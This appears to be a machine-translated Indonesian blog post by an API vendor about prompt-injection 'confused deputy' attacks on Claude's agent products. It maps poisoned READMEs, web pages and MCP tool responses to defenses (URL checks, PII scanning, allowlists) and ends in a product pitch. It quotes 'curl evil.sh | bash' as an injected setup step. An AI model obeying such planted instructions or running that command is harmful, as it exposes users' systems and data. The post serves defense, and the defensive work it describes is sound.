Matriks audit wakil bingung Claude: 4 titik buta, 3 pagar pembatas
Empat tim peneliti menerbitkan temuan injeksi cepat Claude antara tanggal 6 dan 7 Mei 2026. Matriks audit memetakan setiap titik buta ke pagar pembatas beton (pemeriksaan URL, pemindaian PII, daftar izin shell) yang dapat Anda kirimkan minggu ini.
Antara tanggal 6 dan 7 Mei 2026, empat tim peneliti terpisah menerbitkan temuan tentang prompt Claude injeksi. Sebagian besar liputan memperlakukannya sebagai tiga cerita berbeda. Ceritanya sama: a bingung deputi masalah dimana Claude mengeksekusi tindakan atas nama penyerang yang mengontrol konten tidak tepercaya di jendela konteksnya.
README dalam repo kloning dapat menjalankan perintah shell melalui Claude Code. Halaman web di Claude in Chrome dapat meyakinkan agen untuk mengambil URL penyerang. Respons alat MCP dapat memasukkan instruksi yang dipatuhi oleh panggilan alat berikutnya. Model tersebut melakukan apa yang diperintahkan; masalahnya adalah modelnya tidak tahu siapa yang menceritakannya.
Anthropic mengirimkan pertahanan parsial (izin diminta di Claude Code, konfirmasi tindakan di Claude di Chrome). Sisanya milikmu. Berikut adalah matriks audit yang memetakan setiap titik buta ke a pagar pembatas beton dan pemeriksaan API sekali panggilan yang dapat Anda masukkan ke gateway MCP Anda hari ini.
Empat titik buta
| Permukaan | Vektor serangan | Apa yang berjalan | Pagar pembatas asli |
|---|---|---|---|
| Kode Claude | README beracun, paket postinstall, atau git komit badan |
Perintah shell, penulisan file, git push | Perintah izin |
| Claude di Chrome | Instruksi halaman web disamarkan sebagai permintaan pengguna | Klik, kirim formulir, ikuti tautan | Konfirmasi tindakan |
| Claude Desktop + MCP | Respons alat membawa instruksi untuk panggilan berikutnya | Panggilan alat MCP berantai, pembacaan file, pengambilan jaringan | Dialog persetujuan alat |
API tool_use |
String tidak tepercaya di dalam blok hasil alat | Apapun keputusan giliran selanjutnya | Tidak ada secara default |
Setiap pagar pembatas asli menangkap kasus yang jelas (perintah shell yang tidak diminta pengguna) dan melewatkan yang halus (ikal "tidak berbahaya" untuk host serupa yang belum pernah dilihat pengguna). Cara mengatasinya adalah pertahanan mendalam pada lapisan alat, bukan pada lapisan prompt.
Pagar Pembatas 1: phishing-periksa setiap URL yang disentuh agen
Eskalasi deputi bingung yang paling umum adalah "kunjungi URL ini dan beri tahu saya apa yang tertulis di dalamnya". Itu URL milik penyerang. Data yang dibaca agen selanjutnya kini menjadi masukan mereka. Jalankan phishing periksa setiap URL yang tidak dilihat agen di perintah pengguna asli:
Eksekusi mentah yang dihosting pada inti anonim tanpa komit yang disematkan adalah hal klasik
rantai eksekusi cepat-injeksi-ke-shell. Putusannya muncul dalam waktu kurang dari 100 ms; Anda melakukan cache
Hash URL selama 10 menit; Anda membatalkan panggilan alat yang putusannya bukan apa-apa
clean.
Pagar Pembatas 2: PII dan pemindaian rahasia pada setiap respons alat MCP
Eskalasi kedua adalah keracunan respons alat. Alat MCP mengembalikan gumpalan JSON 4 KB; suatu tempat di gumpalan itu ada string instruksi. Claude membaca seluruh gumpalan dan instruksinya menang. Itu blob juga dapat membocorkan kredensial yang diambil di tempat lain, yang kemudian masuk ke dalam alasan model lacak dan log percakapan Anda.
Blokir respons alat agar tidak menjangkau model jika alat tersebut membawa kredensial langsung. Sunting email dan telepon kecuali pengguna memintanya. Perlakukan setiap server MCP sebagai tidak tepercaya secara default; kamu tidak tahu siapa yang meracuni sumber data hulu.
Pagar Pembatas 3: daftar host keras dan shell yang diizinkan di gateway
Eskalasi ketiga adalah eskalasi yang menyerang perusahaan: agen yang secara diam-diam mengembangkan usahanya sendiri
mencapai. README meyakinkan Claude Code untuk dijalankan curl evil.sh | bash "untuk pengaturan." SEBUAH
halaman web meyakinkan Claude di Chrome untuk mengirimkan formulir pada domain yang mirip. Kedua serangan itu mati
terhadap daftar tetap yang diizinkan:
Daftar yang diizinkan itu membosankan. Membosankan adalah intinya. Setiap tindakan yang lolos dari daftar yang diizinkan gagal segera atau memunculkan prompt yang harus dibaca pengguna. Agen tetap berguna di dalam kotak pasir dan tidak berbahaya di luarnya.
Gerbang MCP 60 baris yang menyatukannya
Ketiga pagar pembatas berada dalam satu fungsi middleware yang berada di antara Claude dan setiap MCP server. Ini menarik URL dari respons alat, memeriksanya terhadap kumpulan host tepercaya plus a daftar sesi yang diizinkan, menjalankan pemindaian PII, dan mengembalikan keputusan blok terstruktur ke aplikasi host dapat muncul ke pengguna:
Kumpulan host tepercaya menyimpan API Anda sendiri. Daftar sesi yang diizinkan mulai kosong dan bertambah seiring pengguna secara eksplisit menyetujui host selama sesi. Caching membuat cek tetap gratis URL berulang (pikirkan penomoran halaman, percobaan ulang, halaman dokumen yang sama di seluruh panggilan alat).
Jika Anda belum bisa menjalankan gateway, lakukan versi murah: catat setiap URL dan setiap perintah shell agen melamar ke toko terstruktur, dan waspada terhadap apa pun yang mengenai host yang tidak Anda lakukan melakukan praotorisasi. Deteksi tanpa pencegahan tidak akan ada gunanya.
Dimana hal ini cocok dengan postur pertahanan yang mendalam
Matriks audit bukanlah pengganti karya Anthropic sendiri. Ini adalah lapisan yang Anda kendalikan. SEBUAH perpecahan yang masuk akal:
- Anthropic memiliki model: ketahanan injeksi cepat, hierarki instruksi pelatihan, perilaku penolakan.
- Anda memiliki permukaan alat: Validasi URL, scrubbing PII, host dan shell daftar yang diizinkan, inventaris server MCP.
- IdP Anda memiliki identitas: token berumur pendek untuk agen, per sesi audit, pisahkan kredensial dari pengguna manusia.
Lewati lapisan mana pun dan laporan wakil bingung berikutnya mencakup insiden Anda. Penelitian 6-7 Mei adalah pratinjau gratis tentang hal-hal yang perlu dikirimkan oleh setiap tim sebelum menjadi siklus berita triwulanan.
Poin-poin penting
- Empat titik buta, satu akar permasalahan. Claude memperlakukan setiap token sebagai potensi pembawa instruksi. Konten yang tidak tepercaya dalam konteksnya adalah vektor tindakan, bukan pembacaan pasif.
- URL phishing memeriksa setiap URL yang diusulkan alat. Satu panggilan API, 100 ms, di-cache. Menghilangkan rantai eskalasi injeksi cepat yang paling umum.
- Pemindaian PII pada setiap respons alat MCP. Memblokir eksfiltrasi kredensial alat mengakibatkan keracunan dan menyimpan rahasia dari log percakapan.
- Daftar yang diizinkan secara ketat di gateway. Perintah shell dan daftar izin host mematikan eskalasi "perluas jangkauan secara diam-diam". Membosankan, terbatas, efektif.
- Perpecahan pertahanan yang mendalam. Anthropic memiliki modelnya, Anda memiliki permukaan alatnya, IdP Anda memiliki identitas. Lewati satu layer dan drop penelitian berikutnya akan memberi nama Anda.
Pameran Botoi /v1/phishing/check, /v1/pii/detect,
/v1/url-metadata, dan sekitar 200 titik akhir tujuan tunggal lainnya di belakang satu kunci API
dengan 5 permintaan/mnt gratis. Hubungkan mereka ke gateway MCP Anda atau hubungi mereka dari Claude Code sendiri melalui
itu server botoi MCP.
Telusuri
dokumen interaktif
untuk memulai.
FAQ
- Apa masalah wakil Claude yang bingung?
- Serangan wakil yang membingungkan terjadi ketika proses yang memiliki hak istimewa (Claude Code, Claude di Chrome) menjalankan tindakan atas nama penyerang yang mengontrol sebagian dari masukannya. Antara tanggal 6 dan 7 Mei 2026, empat tim peneliti menerbitkan temuan yang menunjukkan bahwa Claude dapat ditipu untuk menjalankan perintah shell, mengeksfiltrasi data, atau mengunjungi URL penyerang ketika konten yang tidak tepercaya (README, halaman web, respons alat MCP) membawa instruksi yang terlihat seperti permintaan pengguna.
- Permukaan Claude manakah yang terpengaruh?
- Claude Code (agen CLI membaca file repo), Claude di Chrome (agen penjelajahan membaca halaman web), Claude Desktop dengan server MCP (respon alat dapat membawa instruksi), dan API ketika hasil tool_use berisi string yang dikendalikan penyerang. Akar masalahnya sama di keempatnya: Claude memperlakukan setiap token dalam konteks berpotensi membawa instruksi.
- Apakah pagar pembatas kapal Anthropic untuk ini?
- Ya, sebagian. Claude Code memiliki sistem izin untuk penulisan shell dan file. Claude di Chrome memiliki lapisan konfirmasi tindakan. Tidak ada yang menghentikan penyerang yang gigih untuk merantai suntikan cepat dengan rekayasa sosial. Lapisan pertahanan mendalam ada di tangan Anda: validasi setiap URL yang diusulkan agen, pindai setiap respons alat untuk mencari IOC, dan batasi radius ledakan di gateway API.
- Apa bedanya dengan suntikan cepat biasa?
- Injeksi prompt klasik berakhir pada teks keluaran. Deputi yang kebingungan berakhir dengan tindakan: perintah shell dijalankan, URL diambil, webhook diaktifkan, uang dipindahkan. Perbaikan harus dilakukan di tempat tindakan terjadi (lapisan alat), bukan di tempat teks dibuat (model). Itulah sebabnya proxy pagar pembatas dan validasi URL lebih penting daripada pengerasan cepat.
- Berapa jumlah minimum yang harus saya tambahkan minggu ini?
- Tiga hal. Pemeriksaan phishing URL sebelum agen mengambil atau menautkan ke domain apa pun yang tidak dilihatnya di perintah pengguna. Pemindaian PII dan rahasia pada setiap respons alat MCP sebelum memasuki konteks Claude. Dan daftar perintah shell atau host HTTP yang diizinkan di lapisan gateway. Masing-masing merupakan satu panggilan API dan satu blok konfigurasi.
Mulai membangun dengan botoi
150+ endpoint API untuk pencarian, pemrosesan teks, pembuatan gambar, dan utilitas developer. Paket gratis, tanpa kartu kredit.